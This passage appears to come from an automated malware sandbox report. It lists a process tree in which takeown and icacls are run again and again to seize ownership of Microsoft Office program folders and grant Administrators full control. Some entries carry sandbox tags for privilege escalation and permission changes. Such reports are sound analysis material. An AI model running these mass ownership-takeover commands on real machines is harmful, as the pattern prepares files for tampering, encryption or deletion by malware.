  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography" /a
  2⤵
  PID:3860
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography" /grant Administrators:F
  2⤵
  PID:5024
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\1033\DataServices" /a
  2⤵
  PID:2484
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\1033\DataServices" /grant Administrators:F
  2⤵
  PID:4520
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles" /a
  2⤵
  - Possible privilege escalation attempt
  PID:296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles" /grant Administrators:F
  2⤵
  PID:3964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\1036" /a
  2⤵
  - Modifies file permissions
  PID:1492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\1036" /grant Administrators:F
  2⤵
  PID:3684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\3082" /a
  2⤵
  PID:724
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\3082" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3388
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS" /a
  2⤵
  PID:100
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS" /grant Administrators:F
  2⤵
  PID:2376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In" /a
  2⤵
  PID:4384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In" /grant Administrators:F
  2⤵
  PID:4256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated" /a
  2⤵
  PID:2548
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3840
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin" /a
  2⤵
  PID:2252
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin" /grant Administrators:F
  2⤵
  PID:3020
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe" /a
  2⤵
  PID:3904
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe" /grant Administrators:F
  2⤵
  PID:1944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in" /a
  2⤵
  PID:956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in" /grant Administrators:F
  2⤵
  PID:4044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in" /grant Administrators:F
  2⤵
  PID:4928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in" /a
  2⤵
  PID:452
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4368
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in" /grant Administrators:F
  2⤵
  PID:3904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges" /a
  2⤵
  PID:3784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges" /grant Administrators:F
  2⤵
  PID:1148
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\en" /a
  2⤵
  PID:1732
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\en" /grant Administrators:F
  2⤵
  PID:4256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources" /a
  2⤵
  PID:4044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources" /grant Administrators:F
  2⤵
  PID:1464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033" /a
  2⤵
  PID:3388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033" /grant Administrators:F
  2⤵
  PID:3296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\AugLoop" /a
  2⤵
  PID:3020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\AugLoop" /grant Administrators:F
  2⤵
  PID:2336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Bibliography" /a
  2⤵
  PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Bibliography" /grant Administrators:F
  2⤵
  PID:4924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort" /a
  2⤵
  PID:1148
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort" /grant Administrators:F
  2⤵
  PID:3624
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style" /a
  2⤵
  PID:2336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style" /grant Administrators:F
  2⤵
  PID:296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\BORDERS" /a
  2⤵
  PID:1372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\BORDERS" /grant Administrators:F
  2⤵
  PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Configuration" /a
  2⤵
  PID:2168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Configuration" /grant Administrators:F
  2⤵
  PID:2172
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Document Parts" /a
  2⤵
  PID:3972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Document Parts" /grant Administrators:F
  2⤵
  PID:4016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Document Parts\1033" /a
  2⤵
  PID:4412
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Document Parts\1033" /grant Administrators:F
  2⤵
  PID:724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Document Parts\1033\16" /a
  2⤵
  PID:512
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Document Parts\1033\16" /grant Administrators:F
  2⤵
  PID:3904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_f14" /a
  2⤵
  PID:1708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_f14" /grant Administrators:F
  2⤵
  PID:3964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_f2" /a
  2⤵
  PID:1372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_f2" /grant Administrators:F
  2⤵
  PID:5000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_f3" /a
  2⤵
  - Modifies file permissions
  PID:1256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_f3" /grant Administrators:F
  2⤵
  PID:2168
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_f33" /a
  2⤵
  PID:4660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_f33" /grant Administrators:F
  2⤵
  PID:2228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_f4" /a
  2⤵
  PID:2676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_f4" /grant Administrators:F
  2⤵
  PID:4412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_f7" /a
  2⤵
  PID:1720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_f7" /grant Administrators:F
  2⤵
  PID:3388
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006" /a
  2⤵
  PID:4924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006" /grant Administrators:F
  2⤵
  PID:2408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008" /a
  2⤵
  PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008" /grant Administrators:F
  2⤵
  PID:2228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009" /a
  2⤵
  PID:5076
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009" /grant Administrators:F
  2⤵
  PID:3168
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011" /a
  2⤵
  PID:4660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011" /grant Administrators:F
  2⤵
  PID:5000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050" /a
  2⤵
  PID:2548
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050" /grant Administrators:F
  2⤵
  PID:1256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\FPA_w1" /a
  2⤵
  PID:1148
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\FPA_w1" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Library" /a
  2⤵
  PID:3972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Library" /grant Administrators:F
  2⤵
  PID:1708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Library\Analysis" /a
  2⤵
  PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Library\Analysis" /grant Administrators:F
  2⤵
  PID:4512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\Library\SOLVER" /a
  2⤵
  PID:3388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\Library\SOLVER" /grant Administrators:F
  2⤵
  PID:3972
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard" /a
  2⤵
  PID:3904
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard" /grant Administrators:F
  2⤵
  PID:3912
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images" /a
  2⤵
  PID:428
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images" /grant Administrators:F
  2⤵
  PID:956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default" /a
  2⤵
  PID:1148
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default" /grant Administrators:F
  2⤵
  PID:3296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\LogoImages" /a
  2⤵
  PID:3776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\LogoImages" /grant Administrators:F
  2⤵
  PID:1492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MEDIA" /a
  2⤵
  PID:4660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MEDIA" /grant Administrators:F
  2⤵
  PID:3912
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC" /a
  2⤵
  PID:5024
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC" /grant Administrators:F
  2⤵
  PID:3116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar" /a
  2⤵
  PID:3904
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar" /grant Administrators:F
  2⤵
  PID:724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg" /a
  2⤵
  PID:3624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg" /grant Administrators:F
  2⤵
  PID:2228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ca" /a
  2⤵
  PID:4660
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ca" /grant Administrators:F
  2⤵
  PID:3964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\cs" /a
  2⤵
  PID:2408
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\cs" /grant Administrators:F
  2⤵
  PID:1492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\da" /a
  2⤵
  PID:2228
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\da" /grant Administrators:F
  2⤵
  PID:100
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\de" /a
  2⤵
  PID:3296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\de" /grant Administrators:F
  2⤵
  PID:1464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\el" /a
  2⤵
  PID:3904
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\el" /grant Administrators:F
  2⤵
  PID:1372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us" /a
  2⤵
  PID:1736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us" /grant Administrators:F
  2⤵
  PID:100
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\es" /a
  2⤵
  - Modifies file permissions
  PID:3944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\es" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3028
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\et" /a
  2⤵
  PID:3700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\et" /grant Administrators:F
  2⤵
  PID:4412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\eu" /a
  2⤵
  PID:3912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\eu" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\fi" /a
  2⤵
  PID:4044
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\fi" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\fr" /a
  2⤵
  PID:1148
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\fr" /grant Administrators:F
  2⤵
  PID:1944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\gl" /a
  2⤵
  PID:296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\gl" /grant Administrators:F
  2⤵
  PID:2548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\he" /a
  2⤵
  PID:956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\he" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\hi" /a
  2⤵
  PID:3624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\hi" /grant Administrators:F
  2⤵
  PID:2548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\hr" /a
  2⤵
  PID:3840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\hr" /grant Administrators:F
  2⤵
  PID:3944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\hu" /a
  2⤵
  PID:2248
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\hu" /grant Administrators:F
  2⤵
  PID:1708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\id" /a
  2⤵
  PID:5024
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\id" /grant Administrators:F
  2⤵
  PID:2548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\it" /a
  2⤵
  PID:3776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\it" /grant Administrators:F
  2⤵
  PID:1944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja" /a
  2⤵
  - Possible privilege escalation attempt
  PID:956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja" /grant Administrators:F
  2⤵
  PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\kk" /a
  2⤵
  PID:5000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\kk" /grant Administrators:F
  2⤵
  PID:2676
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ko" /a
  2⤵
  PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ko" /grant Administrators:F
  2⤵
  PID:4400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\lt" /a
  2⤵
  PID:956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\lt" /grant Administrators:F
  2⤵
  PID:724
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv" /a
  2⤵
  PID:3168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv" /grant Administrators:F
  2⤵
  PID:3116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ms" /a
  2⤵
  PID:1256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ms" /grant Administrators:F
  2⤵
  PID:2548
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl" /a
  2⤵
  PID:3388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl" /grant Administrators:F
  2⤵
  PID:1708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\no" /a
  2⤵
  PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\no" /grant Administrators:F
  2⤵
  PID:2676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\pl" /a
  2⤵
  PID:724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\pl" /grant Administrators:F
  2⤵
  PID:3932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt" /a
  2⤵
  PID:4256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt" /grant Administrators:F
  2⤵
  PID:3840
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR" /a
  2⤵
  PID:724
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4412
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR" /grant Administrators:F
  2⤵
  PID:3776
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ro" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4512
- C:\windows\system32\icacls.exe
